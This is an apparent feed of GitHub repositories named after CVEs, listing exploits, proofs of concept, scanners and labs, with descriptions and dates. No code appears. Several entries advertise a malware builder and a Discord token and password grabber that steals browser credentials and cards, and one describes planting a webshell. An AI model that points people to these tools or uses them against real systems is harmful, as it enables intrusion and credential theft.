**An exploit for CVE-2017-5638** : [mritunjay-k/CVE-2017-5638](https://github.com/mritunjay-k/CVE-2017-5638) create time: 2023-03-02T04:37:09Z

**A demonstration of CVE-2022-42889 (text4shell) remote code execution vulnerability** : [hotblac/text4shell](https://github.com/hotblac/text4shell) create time: 2023-03-01T20:56:37Z

**The exploit for this vulnerability is being used in the wild** : [LucyRcs/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/LucyRcs/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-03-01T18:26:01Z

**Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords)** : [LucyRcs/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/LucyRcs/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-03-01T18:25:35Z

**no description** : [mritunjay-k/cve-2017-5638](https://github.com/mritunjay-k/cve-2017-5638) create time: 2023-03-01T18:23:27Z

**no description** : [smash8tap/CVE-2023-22490_PoC](https://github.com/smash8tap/CVE-2023-22490_PoC) create time: 2023-03-01T16:37:39Z

**no description** : [nerowander/CVE-2022-25845-exploit](https://github.com/nerowander/CVE-2022-25845-exploit) create time: 2023-03-01T16:17:08Z

**Joomla 未授权访问漏洞 CVE-2023-23752** : [keyuan15/CVE-2023-23752](https://github.com/keyuan15/CVE-2023-23752) create time: 2023-03-01T15:28:24Z

**Joomla 未授权访问漏洞 CVE-2023-23752** : [keyuan15/CVE-2023-23752](https://github.com/keyuan15/CVE-2023-23752) create time: 2023-03-01T13:58:28Z

**no description** : [TheUnknownSoul/CVE-2022-31814](https://github.com/TheUnknownSoul/CVE-2022-31814) create time: 2023-03-01T13:24:29Z

**no description** : [maldev866/ChExp-CVE-2022-0337-](https://github.com/maldev866/ChExp-CVE-2022-0337-) create time: 2023-03-01T11:31:45Z

**PoC of CVE-2021-44228 , log4j** : [sn0wm4ker/log4j_poc](https://github.com/sn0wm4ker/log4j_poc) create time: 2023-02-28T16:12:57Z

**Example of CVE-2022-46689 aka MacDirtyCow.** : [enty8080/MacDirtyCow](https://github.com/enty8080/MacDirtyCow) create time: 2023-03-01T08:23:49Z

**no description** : [umakant76705/CVE-2022-22978](https://github.com/umakant76705/CVE-2022-22978) create time: 2023-03-01T06:21:56Z

**🚀 Exploit for Spring4Shell in C** : [pwnwriter/CVE-2022-22965](https://github.com/pwnwriter/CVE-2022-22965) create time: 2023-02-28T07:39:04Z

**no description** : [ardzz/CVE-2022-1386](https://github.com/ardzz/CVE-2022-1386) create time: 2023-02-28T02:08:59Z

**cve-2020-0796利用工具级** : [OldDream666/cve-2020-0796](https://github.com/OldDream666/cve-2020-0796) create time: 2023-02-28T00:27:37Z

**Kubernetes Lab for CVE-2022-42889** : [devenes/text4shell-cve-2022-42889](https://github.com/devenes/text4shell-cve-2022-42889) create time: 2023-02-28T00:32:01Z

**一键枚举所有用户名以及写入SSH公钥** : [z-bool/CVE-2022-40684](https://github.com/z-bool/CVE-2022-40684) create time: 2023-02-27T18:05:34Z

**no description** : [hhhotdrink/CVE-2021-22205](https://github.com/hhhotdrink/CVE-2021-22205) create time: 2023-02-27T07:42:12Z

**no description** : [sz-guanx/CVE-2021-32305](https://github.com/sz-guanx/CVE-2021-32305) create time: 2023-02-27T05:38:27Z

**nmap detection scripts for CVE-2022-45477, CVE-2022-45479, CVE-2022-45482, CVE-2022-45481** : [M507/nmap-vulnerability-scan-scripts](https://github.com/M507/nmap-vulnerability-scan-scripts) create time: 2023-02-26T23:39:42Z

**no description** : [trhacknon/CVE-2023-0669-bis](https://github.com/trhacknon/CVE-2023-0669-bis) create time: 2023-02-26T20:22:20Z

**PoC for CVE-2022-39952 affecting Fortinet FortiNAC.** : [Chocapikk/CVE-2022-39952](https://github.com/Chocapikk/CVE-2022-39952) create time: 2023-02-26T18:10:04Z

**Exploiting CVE-2020-1472 vulnerability (a.k.a Zerologon) without effort.** : [n3rada/zero-effort](https://github.com/n3rada/zero-effort) create time: 2023-02-26T11:49:44Z

**no description** : [orsuprasad/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/orsuprasad/CVE-2022-0847-DirtyPipe-Exploits) create time: 2023-02-26T07:08:36Z

**no description** : [yosef0x01/Analysis4CVE-2023-0669](https://github.com/yosef0x01/Analysis4CVE-2023-0669) create time: 2023-02-26T02:33:54Z

**CVE-2022-48309 and CVE-2022-48310** : [nitschSB/CVE-2022-48309-and-CVE-2022-48310](https://github.com/nitschSB/CVE-2022-48309-and-CVE-2022-48310) create time: 2023-02-25T19:22:41Z

**Detection script for cve-2021-23358** : [EkamSinghWalia/Detection-script-for-cve-2021-23358](https://github.com/EkamSinghWalia/Detection-script-for-cve-2021-23358) create time: 2023-02-25T19:12:13Z

**no description** : [JonPichel/CVE-2017-7358](https://github.com/JonPichel/CVE-2017-7358) create time: 2023-02-25T11:28:44Z

**no description** : [yilin1203/CVE-2022-40881](https://github.com/yilin1203/CVE-2022-40881) create time: 2023-02-25T06:54:52Z

**Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)** : [4ra1n/CVE-2023-21839](https://github.com/4ra1n/CVE-2023-21839) create time: 2023-02-13T03:42:27Z

**综合利用工具** : [Serendipity-Lucky/CVE-2020-14882_ALL](https://github.com/Serendipity-Lucky/CVE-2020-14882_ALL) create time: 2023-02-24T11:44:06Z

**Joomla! Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion in Python3** : [dpgg101/CVE-2019-10945](https://github.com/dpgg101/CVE-2019-10945) create time: 2023-02-24T10:58:53Z

**综合利用工具** : [Serendipity-Lucky/CVE-2020-14882_ALL](https://github.com/Serendipity-Lucky/CVE-2020-14882_ALL) create time: 2023-02-24T11:04:36Z

**Weblogic CVE-2023-21839 RCE** : [hacats/CVE-2023-21839](https://github.com/hacats/CVE-2023-21839) create time: 2023-02-24T08:44:26Z

**Exploit for CVE-2022–25765 (pdfkit) - Command Injection** : [UNICORDev/exploit-CVE-2022-25765](https://github.com/UNICORDev/exploit-CVE-2022-25765) create time: 2023-02-10T00:50:35Z

**no description** : [yrtsec/CVE-2023-999992](https://github.com/yrtsec/CVE-2023-999992) create time: 2023-02-23T16:11:37Z

**simple program for joomla CVE-2023-23752 scanner for pentesting and educational purpose** : [z3n70/CVE-2023-23752](https://github.com/z3n70/CVE-2023-23752) create time: 2023-02-24T01:33:55Z

**no description** : [yrtsec/CVE-2023-999993](https://github.com/yrtsec/CVE-2023-999993) create time: 2023-02-24T01:31:56Z

**OpenEMR < 7.0.0 Arbitrary File Read** : [gbrsh/CVE-2023-22974](https://github.com/gbrsh/CVE-2023-22974) create time: 2023-02-23T18:14:05Z

**no description** : [fernandodruszcz/CVE-2020-0418](https://github.com/fernandodruszcz/CVE-2020-0418) create time: 2023-02-23T17:05:42Z

**no description** : [yrtsec/CVE-2023-999991](https://github.com/yrtsec/CVE-2023-999991) create time: 2023-02-23T15:48:55Z

**no description** : [3ndorph1n/CVE-2021-42756](https://github.com/3ndorph1n/CVE-2021-42756) create time: 2023-02-23T15:10:06Z

**Exploit apps for CVE-2021-39670 and CVE-2021-39690, two permanent denial-of-service vulnerabilities in Android's wallpaper system** : [Supersonic/Wallbreak](https://github.com/Supersonic/Wallbreak) create time: 2023-02-23T06:36:47Z

**CVE-2023-23752 Joomla 未授权访问漏洞 poc** : [ifacker/CVE-2023-23752-Joomla](https://github.com/ifacker/CVE-2023-23752-Joomla) create time: 2023-02-23T04:37:31Z

**allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.** : [b11y/CVE-2022-32429](https://github.com/b11y/CVE-2022-32429) create time: 2023-02-23T03:33:41Z

**pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library.** : [b11y/CVE-2023-0297](https://github.com/b11y/CVE-2023-0297) create time: 2023-02-23T03:28:18Z

**未授权访问漏洞** : [ibaiw/joomla_CVE-2023-23752](https://github.com/ibaiw/joomla_CVE-2023-23752) create time: 2023-02-23T01:52:02Z

**CVE-2023-23752 poc** : [wangking1/CVE-2023-23752-poc](https://github.com/wangking1/CVE-2023-23752-poc) create time: 2023-02-23T01:40:38Z

**OpenSSH 9.1 vulnerability mass scan and exploit** : [Christbowel/CVE-2023-25136](https://github.com/Christbowel/CVE-2023-25136) create time: 2023-02-22T19:44:08Z

**Vulnerability Disclosure Timeline Closer inspection of the Exploit JPG content reveals the malicious link as well as the URL Download and Execute of the tool used to generate the Exploit JPG from Python encrypted code content which we also implement in couple of our builders.Silent JPG Exploit There are multiple Exploit JPG in Silent JPG Exploit, a** : [Lecyyy/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/Lecyyy/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-02-22T19:06:51Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords) Saved wifi networks & scan networks around device (SSID, BSSID) s** : [Lecyyy/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/Lecyyy/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-02-22T19:04:32Z

**no description** : [M4fiaB0y/CVE-2023-22809](https://github.com/M4fiaB0y/CVE-2023-22809) create time: 2023-02-22T17:50:03Z

**no description** : [Madliife0/CVE-2022-31814](https://github.com/Madliife0/CVE-2022-31814) create time: 2023-02-22T12:38:13Z

**这是一个从黑暗搜索引擎 搜索查找存在此反序列化漏洞 的批量检测脚本** : [Donghan-gugugu/weblogic-CVE2019-POC](https://github.com/Donghan-gugugu/weblogic-CVE2019-POC) create time: 2023-02-22T10:46:58Z

**Write Behinder_webshell to target using CVE-2022-39952** : [shiyeshu/CVE-2022-39952_webshell](https://github.com/shiyeshu/CVE-2022-39952_webshell) create time: 2023-02-22T04:57:06Z

**Used for a PentesterLab exercise** : [jahwni/CVE-2018-6574](https://github.com/jahwni/CVE-2018-6574) create time: 2023-02-22T03:39:28Z

**A CodeQL query to find CVE 2022-35737** : [rvermeulen/codeql-cve-2022-35737](https://github.com/rvermeulen/codeql-cve-2022-35737) create time: 2023-02-21T20:07:45Z

**Privilege escalation memanfaatkan sudoedit** : [kurniawandata/CVE-2023-22809-privilege-escalation](https://github.com/kurniawandata/CVE-2023-22809-privilege-escalation) create time: 2023-02-21T21:09:54Z

**no description** : [trhacknon/CVE-2023-0669](https://github.com/trhacknon/CVE-2023-0669) create time: 2023-02-21T18:47:42Z

**CVE-2022-25765** : [lekosbelas/PDFkit-CMD-Injection](https://github.com/lekosbelas/PDFkit-CMD-Injection) create time: 2023-02-21T17:38:51Z

**CVE-2022-25765** : [lekosbelas/PDFkit-CMD-Injection](https://github.com/lekosbelas/PDFkit-CMD-Injection) create time: 2023-02-21T16:32:15Z

**no description** : [Scarehehe/Weblogic-CVE-2023-21839](https://github.com/Scarehehe/Weblogic-CVE-2023-21839) create time: 2023-02-21T16:08:56Z

**no description** : [ethancunt/CVE-2022-45599](https://github.com/ethancunt/CVE-2022-45599) create time: 2023-02-21T14:55:21Z

**no description** : [ethancunt/CVE-2022-45600](https://github.com/ethancunt/CVE-2022-45600) create time: 2023-02-21T14:53:54Z

**Repository for CVE-2020-15568 Metasploit module** : [divinepwner/TerraMaster-TOS-CVE-2020-15568](https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568) create time: 2023-02-21T13:10:45Z

**no description** : [ethancunt/CVE-2022-45600](https://github.com/ethancunt/CVE-2022-45600) create time: 2023-02-21T13:24:39Z

**POC for CVE-2022-39952** : [horizon3ai/CVE-2022-39952](https://github.com/horizon3ai/CVE-2022-39952) create time: 2023-02-20T15:12:33Z

**no description** : [Griffin-01/CVE-2023-0669](https://github.com/Griffin-01/CVE-2023-0669) create time: 2023-02-21T06:52:28Z

**no description** : [clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131](https://github.com/clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131) create time: 2023-02-21T03:30:20Z

**no description** : [bigherocenter/CVE-2022-41082-POC](https://github.com/bigherocenter/CVE-2022-41082-POC) create time: 2023-02-21T02:59:46Z

**no description** : [DesmondSanctity/CVE-2022-2274](https://github.com/DesmondSanctity/CVE-2022-2274) create time: 2023-02-21T01:56:51Z

**no description** : [nfm/heroku-CVE-2022-44268-reproduction](https://github.com/nfm/heroku-CVE-2022-44268-reproduction) create time: 2023-02-21T01:15:07Z

**Ensimag 3A - Exploit on CVE 2020-7247** : [aurelien-vilminot/ENSIMAG_EXPLOIT_CVE1_3A](https://github.com/aurelien-vilminot/ENSIMAG_EXPLOIT_CVE1_3A) create time: 2023-02-17T20:54:48Z

**Ensimag 3A - Exploit on CVE 2021-3129** : [aurelien-vilminot/ENSIMAG_EXPLOIT_CVE2_3A](https://github.com/aurelien-vilminot/ENSIMAG_EXPLOIT_CVE2_3A) create time: 2023-02-17T21:05:41Z

**no description** : [k4u5h41/CVE-2021-4034_Python3](https://github.com/k4u5h41/CVE-2021-4034_Python3) create time: 2023-02-20T20:39:32Z

**no description** : [0xCarsonS/CVE-2020-7384](https://github.com/0xCarsonS/CVE-2020-7384) create time: 2023-02-20T19:42:38Z

**CVE 2015-6967 Nibbleblog 4.0.3** : [hadrian3689/nibbleblog_4.0.3](https://github.com/hadrian3689/nibbleblog_4.0.3) create time: 2022-04-19T01:26:27Z

**this script is exploit for wordpress old plugin gwolle** : [Ki11i0n4ir3/CVE-2015-8351](https://github.com/Ki11i0n4ir3/CVE-2015-8351) create time: 2021-08-06T08:51:41Z

**Tomcat常见漏洞GUI利用工具。CVE-2017-12615 PUT文件上传漏洞、tomcat-pass-getshell 弱认证部署war包、弱口令爆破、CVE-2020-1938 Tomcat AJP文件读取/包含** : [tpt11fb/AttackTomcat](https://github.com/tpt11fb/AttackTomcat) create time: 2022-11-13T11:01:41Z

**Working Proof of Concept Exploit for CVE-2018-17463** : [jhalon/CVE-2018-17463](https://github.com/jhalon/CVE-2018-17463) create time: 2022-12-28T02:42:59Z

**In FreeRDP less than or equal to 2.0.0, when running with logger set to "WLOG_TRACE", a possible crash of application could occur due to a read of an invalid array index. Data could be printed as string to local terminal. This has been fixed in 2.1.0. CVE project by @Sn0wAlice** : [Lixterclarixe/CVE-2020-11019](https://github.com/Lixterclarixe/CVE-2020-11019) create time: 2023-02-15T12:12:28Z

**The HoYoVerse (formerly miHoYo) Genshin Impact mhyprot2.sys 1.0.0.0 anti-cheat driver does not adequately restrict unprivileged function calls, allowing local, unprivileged users to execute arbitrary code with SYSTEM privileges on Microsoft Windows systems. The mhyprot2.sys driver must first be installed by a user with CVE project by @Sn0wAlice** : [gmh5225/CVE-2020-36603](https://github.com/gmh5225/CVE-2020-36603) create time: 2023-01-12T10:17:58Z

**In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a [Field Transformation](https://docs.splunk.com/Documentation/Splunk/latest/Knowledge/Managefieldtransforms) crashes the Splunk daemon (splunkd). CVE project by @Sn0wAlice** : [eduardosantos1989/CVE-2023-22941](https://github.com/eduardosantos1989/CVE-2023-22941) create time: 2023-02-17T21:26:05Z

**no description** : [missyes/CVE-2023-0045](https://github.com/missyes/CVE-2023-0045) create time: 2023-02-04T09:23:31Z

**A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier. CVE project by @Sn0wAlice** : [Saksham2002/CVE-2006-20001](https://github.com/Saksham2002/CVE-2006-20001) create time: 2023-02-07T05:30:52Z

**CVE-2014-6271 Shellshock** : [hadrian3689/shellshock](https://github.com/hadrian3689/shellshock) create time: 2022-02-21T22:53:00Z

**CVE-2014-6287 Rejetto HFS 2.3** : [hadrian3689/rejetto_hfs_rce](https://github.com/hadrian3689/rejetto_hfs_rce) create time: 2022-01-18T03:45:16Z

**Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)** : [0xSojalSec/CVE-2011-2523](https://github.com/0xSojalSec/CVE-2011-2523) create time: 2022-06-09T16:26:43Z

**PoC for CVE-2022-37032,tested on frr-8.3。** : [spwpun/CVE-2022-37032](https://github.com/spwpun/CVE-2022-37032) create time: 2023-02-20T12:07:22Z

**no description** : [Vulnmachines/joomla_CVE-2023-23752](https://github.com/Vulnmachines/joomla_CVE-2023-23752) create time: 2023-02-20T10:30:17Z

**no description** : [DesmondSanctity/Out-Of-Bounds-read-in-html2xhtml-v1.3-CVE-2022-44311](https://github.com/DesmondSanctity/Out-Of-Bounds-read-in-html2xhtml-v1.3-CVE-2022-44311) create time: 2023-02-20T01:28:04Z

**CVE-2022-39952 Unauthenticated RCE in Fortinet FortiNAC** : [Florian-R0th/CVE-2022-39952](https://github.com/Florian-R0th/CVE-2022-39952) create time: 2023-02-19T23:41:42Z

**https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git** : [WFS-Mend/vtrade-common](https://github.com/WFS-Mend/vtrade-common) create time: 2023-02-19T19:49:41Z

**no description** : [followboy1999/CVE-2022-25365](https://github.com/followboy1999/CVE-2022-25365) create time: 2023-02-19T13:19:10Z

**test** : [Shmily-ing/CVE-2023-2232323](https://github.com/Shmily-ing/CVE-2023-2232323) create time: 2023-02-19T10:32:26Z

**POC to test the BootROM vulnerability found in LPC55S69 and K82 Series** : [Jeromeyoung/CVE-2021-40154](https://github.com/Jeromeyoung/CVE-2021-40154) create time: 2021-11-24T01:34:47Z

**no description** : [Yealid/CVE-2018-6574](https://github.com/Yealid/CVE-2018-6574) create time: 2023-02-18T21:46:18Z

**Poc for CVE-2023-23752 (joomla CMS) - simple bash script to get sensitive info** : [WhiteOwl-Pub/CVE-2023-23752](https://github.com/WhiteOwl-Pub/CVE-2023-23752) create time: 2023-02-18T20:43:43Z

**BookingPress < 1.0.11 - Unauthenticated SQL Injection** : [ElGanz0/CVE-2022-0739](https://github.com/ElGanz0/CVE-2022-0739) create time: 2023-02-18T15:23:49Z

**Lab introduction to ZeroLogon** : [RicYaben/CVE-2020-1472-LAB](https://github.com/RicYaben/CVE-2020-1472-LAB) create time: 2023-02-18T14:52:17Z

**no description** : [reewardius/CVE-2022-32074](https://github.com/reewardius/CVE-2022-32074) create time: 2023-02-18T13:19:03Z

**no description** : [reewardius/CVE-2022-31889](https://github.com/reewardius/CVE-2022-31889) create time: 2023-02-18T13:14:53Z

**no description** : [reewardius/CVE-2022-32132](https://github.com/reewardius/CVE-2022-32132) create time: 2023-02-18T13:11:13Z

**no description** : [reewardius/CVE-2022-31890](https://github.com/reewardius/CVE-2022-31890) create time: 2023-02-18T12:40:45Z

**CVE-2018-2628漏洞工具** : [Serendipity-Lucky/CVE-2018-2628](https://github.com/Serendipity-Lucky/CVE-2018-2628) create time: 2023-02-18T12:35:26Z

**CVE-2023-23752 nuclei template** : [Saboor-Hakimi/CVE-2023-23752](https://github.com/Saboor-Hakimi/CVE-2023-23752) create time: 2023-02-18T12:19:24Z

**Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40348](https://github.com/Live-Hack-CVE/CVE-2022-40348) create time: 2023-02-18T07:12:27Z

**Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository pixelfed/pixelfed prior to 0.11.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0901](https://github.com/Live-Hack-CVE/CVE-2023-0901) create time: 2023-02-18T07:12:30Z

**Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)** : [T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC](https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC) create time: 2023-02-18T04:48:25Z

**CVE-2023-0669 Encrpytion helper** : [yosef0x01/CVE-2023-0669](https://github.com/yosef0x01/CVE-2023-0669) create time: 2023-02-18T05:54:22Z

**Joomla! 未授权访问漏洞** : [YusinoMy/CVE-2023-23752](https://github.com/YusinoMy/CVE-2023-23752) create time: 2023-02-18T03:36:54Z

**HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107, function `pci_vtsock_proc_tx` in `virtio-sock` can lead to to uninitialized memory use. In this situation, there is a check for the return value to be less or equal to `VTSOCK_MAXSEGS`, but that check is not sufficien CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32846](https://github.com/Live-Hack-CVE/CVE-2021-32846) create time: 2023-02-18T01:36:41Z

**HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107 and prior of HyperKit, the implementation of `qnotify` at `pci_vtrnd_notify` fails to check the return value of `vq_getchain`. This leads to `struct iovec iov;` being uninitialized and used to read memory in `len = (in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32845](https://github.com/Live-Hack-CVE/CVE-2021-32845) create time: 2023-02-18T01:36:38Z

**HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107 and prior of HyperKit, ` vi_pci_write` has is a call to `vc_cfgwrite` that does not check for null which when called makes the host crash. This issue may lead to a guest crashing the host causing a denial of service. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32844](https://github.com/Live-Hack-CVE/CVE-2021-32844) create time: 2023-02-18T01:36:34Z

**HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107 and prior of HyperKit, `virtio.c` has is a call to `vc_cfgread` that does not check for null which when called makes the host crash. This issue may lead to a guest crashing the host causing a denial of service. This is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32843](https://github.com/Live-Hack-CVE/CVE-2021-32843) create time: 2023-02-18T01:36:31Z

**The framework service handles pendingIntent incorrectly, allowing a malicious application with certain privileges to perform privileged actions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26277](https://github.com/Live-Hack-CVE/CVE-2021-26277) create time: 2023-02-17T23:22:22Z

**The dropdown menu in jspreadsheet before v4.6.0 was discovered to be vulnerable to cross-site scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48115](https://github.com/Live-Hack-CVE/CVE-2022-48115) create time: 2023-02-17T23:22:29Z

**QVidium Technologies Amino A140 (prior to firmware version 1.0.0-283) was discovered to contain a command injection vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40021](https://github.com/Live-Hack-CVE/CVE-2022-40021) create time: 2023-02-17T23:22:01Z

**Adobe InDesign versions ID18.1 (and earlier) and ID17.4 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interacti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21593](https://github.com/Live-Hack-CVE/CVE-2023-21593) create time: 2023-02-17T23:23:23Z

**TOTOLINK A720R V4.1.5cu.532_ B20210610 is vulnerable to Incorrect Access Control. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23064](https://github.com/Live-Hack-CVE/CVE-2023-23064) create time: 2023-02-17T23:23:20Z

**Adobe Animate versions 22.0.8 (and earlier) and 23.0.0 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22246](https://github.com/Live-Hack-CVE/CVE-2023-22246) create time: 2023-02-17T23:23:16Z

**FrameMaker 2020 Update 4 (and earlier), 2022 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21584](https://github.com/Live-Hack-CVE/CVE-2023-21584) create time: 2023-02-17T23:23:13Z

**Adobe Premiere Rush version 2.6 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22244](https://github.com/Live-Hack-CVE/CVE-2023-22244) create time: 2023-02-17T23:23:10Z

**Adobe Bridge versions 12.0.3 (and earlier) and 13.0.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a vict CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21583](https://github.com/Live-Hack-CVE/CVE-2023-21583) create time: 2023-02-17T23:23:06Z

**Adobe Animate versions 22.0.8 (and earlier) and 23.0.0 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22243](https://github.com/Live-Hack-CVE/CVE-2023-22243) create time: 2023-02-17T23:23:03Z

**Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21577](https://github.com/Live-Hack-CVE/CVE-2023-21577) create time: 2023-02-17T23:23:00Z

**After Affects versions 23.1 (and earlier), 22.6.3 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22239](https://github.com/Live-Hack-CVE/CVE-2023-22239) create time: 2023-02-17T23:22:56Z

**Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21576](https://github.com/Live-Hack-CVE/CVE-2023-21576) create time: 2023-02-17T23:22:53Z

**After Affects versions 23.1 (and earlier), 22.6.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22238](https://github.com/Live-Hack-CVE/CVE-2023-22238) create time: 2023-02-17T23:22:49Z

**Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21575](https://github.com/Live-Hack-CVE/CVE-2023-21575) create time: 2023-02-17T23:22:46Z

**Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21574](https://github.com/Live-Hack-CVE/CVE-2023-21574) create time: 2023-02-17T23:22:43Z

**After Affects versions 23.1 (and earlier), 22.6.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22237](https://github.com/Live-Hack-CVE/CVE-2023-22237) create time: 2023-02-17T23:22:39Z

**In RESTEasy the insecure File.createTempFile() is used in the DataSourceProvider, FileProvider and Mime4JWorkaround classes which creates temp files with insecure permissions that could be read by a local user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0482](https://github.com/Live-Hack-CVE/CVE-2023-0482) create time: 2023-02-17T23:22:36Z

**Adobe Animate versions 22.0.8 (and earlier) and 23.0.0 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22236](https://github.com/Live-Hack-CVE/CVE-2023-22236) create time: 2023-02-17T23:22:32Z

**Adobe Premiere Rush version 2.6 (and earlier) is affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22234](https://github.com/Live-Hack-CVE/CVE-2023-22234) create time: 2023-02-17T23:22:25Z

**After Affects versions 23.1 (and earlier), 22.6.3 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22233](https://github.com/Live-Hack-CVE/CVE-2023-22233) create time: 2023-02-17T23:22:18Z

